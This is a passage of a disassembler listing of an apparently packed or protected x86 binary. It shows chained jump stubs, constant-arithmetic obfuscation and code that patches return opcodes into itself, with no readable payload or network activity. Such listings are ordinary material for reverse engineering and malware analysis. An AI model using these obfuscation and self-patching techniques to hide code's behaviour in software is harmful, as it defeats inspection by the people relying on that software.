; START	OF FUNCTION CHUNK FOR sub_43ED1F

loc_4571DC:				; CODE XREF: sub_43ED1F+4j
		mov	eax, [esp+0]
		push	edx
		call	sub_442D04
		push	0B8445E38h
		pop	eax
		jmp	loc_442846
; END OF FUNCTION CHUNK	FOR sub_43ED1F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_4571F0:				; CODE XREF: sub_44B2D7:loc_457C5Aj
		jnz	loc_43EB6A
		or	ecx, edx
		mov	[ebp+0], eax
		test	edx, 2774BFCEh
		jmp	loc_44FACC
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_497. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599AA

loc_457207:				; CODE XREF: sub_4599AA+8j
		jmp	loc_44FEFC
; END OF FUNCTION CHUNK	FOR sub_4599AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457580

loc_45720C:				; CODE XREF: sub_457580-1397j
		jmp	loc_44AB5A
; END OF FUNCTION CHUNK	FOR sub_457580
; ---------------------------------------------------------------------------

loc_457211:				; CODE XREF: k2vbe3.d:004400AAj
		jnz	loc_4452B2
		jmp	loc_44782E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45000F

loc_45721C:				; CODE XREF: sub_45000F+8776j
		jz	loc_44B55C
		jmp	loc_44E31A
; END OF FUNCTION CHUNK	FOR sub_45000F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_457227:				; CODE XREF: sub_43C3A9+18D7Bj
		sub	eax, 594BFF6Ch
		js	loc_43C19A
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; START	OF FUNCTION CHUNK FOR sub_4504F3

loc_457233:				; CODE XREF: sub_4504F3:loc_4504FFj
		pop	esi
		add	eax, ecx
		xor	ecx, edi
		jmp	loc_43C19A
; END OF FUNCTION CHUNK	FOR sub_4504F3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455A4F

loc_45723D:				; CODE XREF: sub_455A4F+10j
		mov	edx, [esp+4+var_4]
		push	eax
		mov	eax, edx
		nop
		mov	eax, [esp+0]
		push	ebx
		jmp	loc_454781
; END OF FUNCTION CHUNK	FOR sub_455A4F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_353. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_45724E	proc near		; CODE XREF: k2vbe3.d:0043F301j
					; sub_44471B:loc_456628p
		xchg	eax, [esp+0]
		pop	eax
		pop	ebp
		retn
sub_45724E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_457254:				; CODE XREF: k2vbe3.d:0044E027j
		jmp	loc_4578D7
; ---------------------------------------------------------------------------

loc_457259:				; CODE XREF: k2vbe3.d:0044E9B7j
		jle	loc_440907

; =============== S U B	R O U T	I N E =======================================



sub_45725F	proc near		; CODE XREF: k2vbe3.d:00441713p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004415D0 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00452D15 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045BF76 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, [esp+0]
		jmp	loc_4415D0
sub_45725F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45762D

loc_45726B:				; CODE XREF: sub_45762D-54F0j
		sub	ebx, 2EAA9067h
		and	ebx, 49D8CB27h
		xor	ebx, 8539160Ch
		xor	eax, ebx
		pop	ebx
		mov	edx, [esp+0]
		jmp	loc_4551DE
; END OF FUNCTION CHUNK	FOR sub_45762D
; ---------------------------------------------------------------------------
		mov	al, 1
		pop	edx
		call	edx
		xor	eax, eax
		mov	[ebp-4], eax
		jmp	loc_4587D4
; ---------------------------------------------------------------------------

loc_457297:				; CODE XREF: k2vbe3.d:00458A20j
		jbe	loc_44B911
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_45729D:				; CODE XREF: sub_454E83:loc_454284j
		add	esi, 0FFC104D4h
		add	esi, ebp
		add	esi, 664FC6Ch
		mov	[esi], eax
		jmp	loc_458698
; END OF FUNCTION CHUNK	FOR sub_454E83
; ---------------------------------------------------------------------------

loc_4572B2:				; CODE XREF: k2vbe3.d:00454CCFj
		sub	ecx, 0B920AF31h
		ror	edi, 1Ah
; START	OF FUNCTION CHUNK FOR sub_4529D2

loc_4572BB:				; CODE XREF: sub_4529D2+22F0j
		or	edi, 33BD423h
		add	edi, 0DC88F23Dh
		xchg	edi, [esp-4+arg_0]
		jmp	sub_45837E
; END OF FUNCTION CHUNK	FOR sub_4529D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450359

loc_4572CF:				; CODE XREF: sub_450359:loc_45A4E7j
		pop	ecx
		xchg	ecx, [esp-8+arg_4]
		push	ecx
		push	463690CDh
		pop	ecx
		xor	ecx, 303ECD20h
		jmp	loc_44A71F
; END OF FUNCTION CHUNK	FOR sub_450359
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_4572E5:				; CODE XREF: sub_4529E2:loc_4438A3j
		jb	loc_448538
		jo	loc_45048A
		jmp	loc_44852D
; END OF FUNCTION CHUNK	FOR sub_4529E2

; =============== S U B	R O U T	I N E =======================================



sub_4572F6	proc near		; CODE XREF: k2vbe3.d:00443E27j
					; sub_44D0D5+7F65p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00450A2A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459409 SIZE 0000000F BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	edx, [esp+0]
		call	sub_458B3C

loc_457302:				; CODE XREF: k2vbe3.d:00445186j
					; sub_450F71+235Ej
		jmp	loc_459409
sub_4572F6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	edi
		push	0CF8FB5AFh
		pop	edi
		rol	edi, 1Dh
		jmp	loc_4473C6
; ---------------------------------------------------------------------------
		sbb	ebx, 7CE95DF4h
		jmp	sub_45B64A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A5FF

loc_457321:				; CODE XREF: sub_45A5FF-1A490j
					; sub_45A5FF:loc_44FE24j
		push	offset sub_4462B1
		jmp	nullsub_540
; END OF FUNCTION CHUNK	FOR sub_45A5FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_45732B:				; CODE XREF: k2vbe3.d:004411B7j
					; sub_43C3A9+17409j
		jb	loc_43EADB
		sub	esi, 9B4EC49Ch

loc_457337:				; CODE XREF: k2vbe3.d:loc_4411AAj
		add	ecx, 0CE16A228h
		xchg	ecx, [esp+4+var_4]
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_457345:				; CODE XREF: sub_44C90E:loc_446748j
		jz	loc_452762
		jmp	loc_452296
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_457350:				; CODE XREF: sub_4597AE+9j
		xchg	edx, [esp+0Ch+var_C]
		mov	ebp, esp
		call	sub_45B180

loc_45735A:				; CODE XREF: sub_44B94B-67CAj
		jmp	loc_44940B
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454FA8

loc_45735F:				; CODE XREF: sub_454FA8-9D79j
		adc	edi, 99C84B43h
		or	edi, 450DDC6Ch
		jmp	loc_450ADE
; END OF FUNCTION CHUNK	FOR sub_454FA8
; ---------------------------------------------------------------------------

loc_457370:				; CODE XREF: k2vbe3.d:loc_43E3E4j
		push	edi
		mov	edi, edx
		xchg	edi, [esp]
		call	sub_44660F
		jmp	loc_4570D8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_416. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_457381:				; CODE XREF: k2vbe3.d:00449E14j
		jmp	sub_4436CE
; ---------------------------------------------------------------------------

loc_457386:				; CODE XREF: k2vbe3.d:loc_43F347j
		push	400000h
		mov	eax, [ebp-10h]
; START	OF FUNCTION CHUNK FOR sub_43D85C

loc_45738E:				; CODE XREF: sub_43D85C:loc_4595DEj
		push	edx
		mov	edx, eax
		xchg	edx, [esp+4+var_4]
		push	eax
		push	offset sub_44CBF8
		jmp	loc_441FDC
; END OF FUNCTION CHUNK	FOR sub_43D85C

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_45739F	proc near		; CODE XREF: sub_457A42-10472j
		retn
sub_45739F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_4573A0:				; CODE XREF: sub_44A79B:loc_445536j
					; sub_44A79B+3AC6j
		call	sub_4436CE
		push	offset loc_459895
		jmp	nullsub_239
; END OF FUNCTION CHUNK	FOR sub_44A79B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E2FC

loc_4573AF:				; CODE XREF: sub_43E2FC:loc_44C960j
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_493
; END OF FUNCTION CHUNK	FOR sub_43E2FC

; =============== S U B	R O U T	I N E =======================================



sub_4573B7	proc near		; CODE XREF: sub_419A20+19p
					; k2vbe3.d:0044AC74j
					; DATA XREF: ...

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00445311 SIZE 00000005 BYTES

		push	eax
		push	26D055D3h
		xchg	esi, [esp+8+var_8]
		jmp	loc_445311
sub_4573B7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F77F

loc_4573C5:				; CODE XREF: sub_43F77F+4j
		add	eax, 0ABA5147h
		jmp	loc_44EF49
; END OF FUNCTION CHUNK	FOR sub_43F77F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AD9D

loc_4573D0:				; CODE XREF: sub_44AD9Dj
		push	offset loc_459050
		jmp	loc_4595B2
; END OF FUNCTION CHUNK	FOR sub_44AD9D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BB73

loc_4573DA:				; CODE XREF: sub_44BB73+DC5Aj
		jz	loc_454B80

loc_4573E0:				; CODE XREF: sub_43E88E+145B6j
		jmp	loc_456C8E
; END OF FUNCTION CHUNK	FOR sub_44BB73
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441172

loc_4573E5:				; CODE XREF: sub_441172+51B5j
		jmp	loc_4450D0
; END OF FUNCTION CHUNK	FOR sub_441172
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA63

loc_4573EA:				; CODE XREF: sub_45AA63-173FBj
		jmp	loc_454572
; END OF FUNCTION CHUNK	FOR sub_45AA63
; ---------------------------------------------------------------------------
		mov	edx, 0F7D498A0h
		jmp	loc_44B17E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_4573F9:				; CODE XREF: sub_443A30-3A63j
		jg	loc_43C34D
		add	esi, edi
		and	ebx, edi
		jmp	loc_44C7F8
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_457408:				; CODE XREF: sub_4582DD:loc_447A6Bj
		sub	al, 99h
		mov	edx, [ebp-4]
		jmp	loc_4511AC
; END OF FUNCTION CHUNK	FOR sub_4582DD

; =============== S U B	R O U T	I N E =======================================



sub_457412	proc near		; DATA XREF: k2vbe3.d:0043DD22o
		mov	ds:off_41E1F8, eax
		lea	eax, sub_44081A
		mov	byte ptr [eax],	0C3h
sub_457412	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44CA34

loc_457421:				; CODE XREF: sub_44CA34+4340j
		jmp	loc_452AA4
; END OF FUNCTION CHUNK	FOR sub_44CA34
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44081A

loc_457426:				; CODE XREF: sub_44081Aj
		xchg	ebp, [esp+0]
		push	ebp
		pop	edx
		pop	ebp
		jmp	loc_43E415
; END OF FUNCTION CHUNK	FOR sub_44081A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EC4A

loc_457431:				; CODE XREF: sub_44EC4A-BA5Fj
		push	offset loc_450D97
		jmp	nullsub_240
; END OF FUNCTION CHUNK	FOR sub_44EC4A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450CBF

loc_45743B:				; CODE XREF: sub_450CBF+56EFj
		jz	loc_44A74E
		jmp	loc_4462A7
; END OF FUNCTION CHUNK	FOR sub_450CBF
; ---------------------------------------------------------------------------

loc_457446:				; CODE XREF: k2vbe3.d:0045192Cj
		or	eax, 0A338F9FCh

; =============== S U B	R O U T	I N E =======================================



sub_45744C	proc near		; CODE XREF: sub_456666-A837p

; FUNCTION CHUNK AT 0044C394 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F3E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458E48 SIZE 00000009 BYTES

		xchg	edx, [esp+0]
		pop	edx
		sub	ebx, ecx
		pop	ecx
		jmp	loc_44F3E2
sub_45744C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_457458	proc near		; DATA XREF: sub_44B320+Ao
		xchg	ecx, [esp+0]
		jmp	sub_44B4E4
sub_457458	endp

; ---------------------------------------------------------------------------

loc_457460:				; CODE XREF: k2vbe3.d:loc_44936Dj
		xor	esi, 0C586BCA7h
		or	esi, 5C709025h
		xor	esi, 0CA05B806h
		or	esi, 0ADEB494Fh
		add	esi, 2A7C2551h
		add	esi, ebp
		push	eax
		jmp	loc_4490CD
; ---------------------------------------------------------------------------

loc_457486:				; CODE XREF: k2vbe3.d:loc_447DE9j
		mov	[ecx], eax
		pop	ecx
		mov	eax, [ebp-4]
		push	offset sub_442053
		jmp	locret_44AF5F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4588E6

loc_457496:				; CODE XREF: sub_4588E6:loc_45598Fj
		mov	eax, ds:dword_441210
		mov	eax, [eax]
		mov	ds:dword_441228, eax
		xor	eax, eax
		mov	ds:dword_441210, eax
		jmp	loc_442F81
; END OF FUNCTION CHUNK	FOR sub_4588E6

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4574AE	proc near		; CODE XREF: sub_4508A3j

; FUNCTION CHUNK AT 00441E85 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00446E91 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		jmp	loc_441E85
sub_4574AE	endp

; ---------------------------------------------------------------------------
		jg	loc_455942
		or	edi, 1A400F1Bh
		jmp	sub_43D86B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4574C8:				; CODE XREF: sub_45A323:loc_45A3C9j
		imul	byte ptr [edx]
		push	offset sub_459A60
		jmp	loc_45655C
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_4574D4	proc near		; CODE XREF: sub_44A2DF+B379j
		retn
sub_4574D4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_4574D5:				; CODE XREF: sub_446E24+C426j
		jmp	loc_44A975
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F1

loc_4574DA:				; CODE XREF: sub_44D2F1+1A65j
		jmp	loc_458191
; END OF FUNCTION CHUNK	FOR sub_44D2F1
; ---------------------------------------------------------------------------

loc_4574DF:				; CODE XREF: k2vbe3.d:loc_43CB10j
		xchg	ebx, [esp]
		mov	ecx, ebx
		pop	ebx
		call	sub_442A2D
; START	OF FUNCTION CHUNK FOR sub_44CCD8

loc_4574EA:				; CODE XREF: sub_44CCD8:loc_451A5Cj
		xchg	ecx, [esp+0]
		push	2A1ECAB8h
		call	sub_44B6EC
; END OF FUNCTION CHUNK	FOR sub_44CCD8
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_4574F7:				; CODE XREF: sub_44A79B:loc_444BE0j
		add	ebx, 109BB816h
		xchg	ebx, [esp+0]
		jmp	sub_4508A3
; END OF FUNCTION CHUNK	FOR sub_44A79B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_457505:				; CODE XREF: sub_4580DF-8444j
		jz	loc_43E48A
		not	edi
		jmp	loc_43E484
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_457512:				; CODE XREF: sub_44DB59:loc_44282Cj
		jnz	loc_44B81A
		jmp	loc_45A16C
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_45751D:				; CODE XREF: sub_43C865:loc_447829j
		jb	loc_440A9B
		rol	esi, 15h
		jmp	loc_45C308
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_45752B:				; CODE XREF: sub_44B912+6117j
		or	ebx, 664BA3EBh

loc_457531:				; CODE XREF: sub_44B912:loc_44DDC4j
		push	24445186h
		pop	eax
		sub	eax, 6AAB700h
		or	eax, 2DF647EBh
		xor	eax, 0D3BA28C1h
		add	eax, 1F67AC1Dh
		add	eax, ebp
		jmp	loc_44E407
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_457556:				; CODE XREF: sub_45A323-1750Cj
					; sub_44B870-8A50j ...
		jo	loc_4408F8
		cmp	dword ptr [ebp-4], 4
		jnz	loc_45571B
		jmp	loc_452892
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_45756B	proc near		; CODE XREF: sub_44E827+3E2p
					; k2vbe3.d:0045016Bj

; FUNCTION CHUNK AT 0043C044 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455DB9 SIZE 00000008 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	ds:dword_41E164, eax
		lea	eax, nullsub_431
		jmp	loc_455DB9
sub_45756B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_457580	proc near		; CODE XREF: k2vbe3.d:0044B12Dj
					; sub_44B912:loc_44E57Cp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00442DCF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442EE4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447F53 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448F68 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004496B0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044AB5A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004556FE SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004561E3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045715A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045720C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458504 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B7E9 SIZE 0000000B BYTES

		xchg	edx, [esp+0]
		pop	edx
		call	sub_43C04E

loc_457589:				; CODE XREF: k2vbe3.d:loc_44ACCCj
		test	al, al
		jmp	loc_458504
sub_457580	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_457590:				; CODE XREF: sub_43FF90:loc_458379j
		push	ecx
		push	7ACFCFA2h
		pop	ecx
		sub	ecx, 72F9260h
		or	ecx, 6CB4CFA6h
		test	ecx, 4
		jmp	loc_443D83
; END OF FUNCTION CHUNK	FOR sub_43FF90
; ---------------------------------------------------------------------------

loc_4575AE:				; CODE XREF: k2vbe3.d:004436ADj
		add	esi, 1C324199h
		popf

loc_4575B5:				; CODE XREF: k2vbe3.d:loc_44C7BBj
		xchg	esi, [esp]
		jmp	loc_442027

; =============== S U B	R O U T	I N E =======================================



sub_4575BD	proc near		; CODE XREF: k2vbe3.d:00452A77p
					; k2vbe3.d:004552D7j

; FUNCTION CHUNK AT 00440523 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004415E5 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004441FC SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00446BFF SIZE 00000001 BYTES
; FUNCTION CHUNK AT 00447E98 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448317 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00449724 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0044AA57 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BD2C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BEE6 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044C349 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044DC6F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004520E3 SIZE 0000001B BYTES

		xchg	edx, [esp+0]
		pop	edx
		test	eax, eax
		jz	loc_446C00
		jmp	loc_44DC6F
sub_4575BD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F42B

loc_4575CE:				; CODE XREF: sub_44F42B:loc_4538A6j
		jz	loc_43C570
		jmp	loc_43FD37
; END OF FUNCTION CHUNK	FOR sub_44F42B
; ---------------------------------------------------------------------------

loc_4575D9:				; CODE XREF: k2vbe3.d:00457F3Cj
		jz	loc_43D090

; =============== S U B	R O U T	I N E =======================================



sub_4575DF	proc near		; CODE XREF: k2vbe3.d:00456B24p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C5E6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043F2B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445F87 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044F232 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004563D1 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	edx
		push	3640FC74h
		xchg	ebx, [esp+4+var_4]
		mov	edx, ebx
		pop	ebx
		jmp	loc_43C5E6
sub_4575DF	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440CEA

loc_4575F4:				; CODE XREF: sub_440CEA:loc_4507DEj
		jz	loc_4531B8
		jmp	loc_455E6E
; END OF FUNCTION CHUNK	FOR sub_440CEA
; ---------------------------------------------------------------------------
		pop	esi
		jmp	sub_4478C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_457605:				; CODE XREF: sub_45A323-A495j
		add	ecx, 0C2F57A09h
		sub	ecx, 0D29A0BE4h
		test	ecx, 4000000h
		jmp	loc_4482B0
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
		sub	eax, 7A56E78Dh
		sub	edi, 1FDCB426h
		jmp	sub_450359

; =============== S U B	R O U T	I N E =======================================



sub_45762D	proc near		; CODE XREF: sub_44E542+6p
					; k2vbe3.d:00456315j

var_8		= dword	ptr -8
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043E86C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FC6A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00440B8B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004417D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004422C2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00443A9B SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044BA12 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044C9B8 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00450D63 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045212C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004551DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455824 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045726B SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045B150 SIZE 00000012 BYTES

		xchg	edx, [esp+0]
		pop	edx
		pop	ecx
		push	edi
		pushf
		push	873B6D05h
		pop	edi
		jmp	loc_443A9B
sub_45762D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_45763F:				; CODE XREF: sub_43CCD0:loc_44AE77j
		jge	loc_43D922

loc_457645:				; CODE XREF: k2vbe3.d:loc_45BC61j
		jmp	nullsub_283
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C310

loc_45764A:				; CODE XREF: sub_44C310+11j
		jmp	loc_455182
; END OF FUNCTION CHUNK	FOR sub_44C310
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_45764F:				; CODE XREF: sub_45101A-E49Dj
		jmp	loc_43DD2C
; END OF FUNCTION CHUNK	FOR sub_45101A
; ---------------------------------------------------------------------------
		and	ecx, 0CB7B94A6h
		test	ebp, eax
		jmp	loc_43D91C
; ---------------------------------------------------------------------------

loc_457661:				; CODE XREF: k2vbe3.d:0045B492j
		xchg	edi, [esi]
		and	edx, edi
		jz	loc_44DDA1
; START	OF FUNCTION CHUNK FOR sub_45B4EE

loc_45766B:				; CODE XREF: sub_45B4EE-72j
		add	edi, 9744D4F5h
		add	eax, edi
		jmp	loc_458AE1
; END OF FUNCTION CHUNK	FOR sub_45B4EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FEF3

loc_457678:				; CODE XREF: sub_44FEF3+4j
		push	0A8F340BFh
		pop	edx
		sub	edx, 3ADA10CFh
		or	edx, 0AEC754D3h

loc_45768A:				; CODE XREF: k2vbe3.d:loc_45B70Aj
		jmp	loc_449E6A
; END OF FUNCTION CHUNK	FOR sub_44FEF3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4521CB

loc_45768F:				; CODE XREF: sub_4521CB+16j
		add	eax, 5A69A286h
		rol	eax, 2
		add	eax, 0D6192C7h
		xchg	eax, [esp+10h+var_10]
		jmp	loc_43C2E5
; END OF FUNCTION CHUNK	FOR sub_4521CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45960E

loc_4576A6:				; CODE XREF: sub_45960E+7j
		mov	edi, ebp
		pop	ebp
		add	edi, 0FB4FBEFBh
		and	edi, 4614884Eh
		add	edi, 0FC3FEC50h
		xchg	edi, [esp-4+arg_0]
		jmp	loc_4411E5
; END OF FUNCTION CHUNK	FOR sub_45960E
; ---------------------------------------------------------------------------
		push	1DCCEECFh
		jmp	loc_43ED1D
; ---------------------------------------------------------------------------

loc_4576CD:				; DATA XREF: sub_4537C9-12F3Bo
		add	eax, 8E5D4B38h
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_4576D3:				; CODE XREF: sub_4582DD-1A764j
		add	eax, ebp
		add	eax, 0E9E6B1F4h
		mov	eax, [eax]
		mov	al, [eax]
		jmp	loc_441A04
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_4576E4:				; CODE XREF: sub_445124+AB2Dj
		xor	eax, 0FC5F7A62h
		or	eax, ds:4000F0h
		and	eax, 0F3633CE8h
		add	eax, 7386CE39h
		add	eax, ebp
		add	eax, 5A16F52Bh
		jmp	loc_44E8C8
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_457709:				; CODE XREF: sub_43DEBE+2E61j
		and	eax, 0F0711E3Ch
		or	eax, 0A7C4C3E1h
		push	offset loc_458FC2
		jmp	nullsub_246
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441A09

loc_45771F:				; CODE XREF: sub_441A09+1j
		mov	ebp, esp
		push	ebx
		mov	ebx, ecx

loc_457724:				; CODE XREF: sub_45B20A:loc_453784j
		xchg	ebx, [esp+8+var_8]
		push	ebp
		jmp	loc_45AECA
; END OF FUNCTION CHUNK	FOR sub_441A09
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4423D2

loc_45772D:				; CODE XREF: sub_4423D2:loc_4423E4j
		jz	loc_452B2B
		jmp	loc_447B9D
; END OF FUNCTION CHUNK	FOR sub_4423D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D823

loc_457738:				; CODE XREF: sub_43D823:loc_443BC1j
		rol	edi, 0Dh
		add	edi, 82687C8Fh
		xchg	edi, [esp-4+arg_0]
		jmp	sub_451759
; END OF FUNCTION CHUNK	FOR sub_43D823
; ---------------------------------------------------------------------------
		mov	ds:off_41E01C, eax
		lea	eax, loc_45195B
		mov	byte ptr [eax],	0C3h
		jmp	loc_43CB06

; =============== S U B	R O U T	I N E =======================================



sub_45775D	proc near		; CODE XREF: sub_41A6CF+132p
					; k2vbe3.d:00457033j
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043F11B SIZE 00000017 BYTES
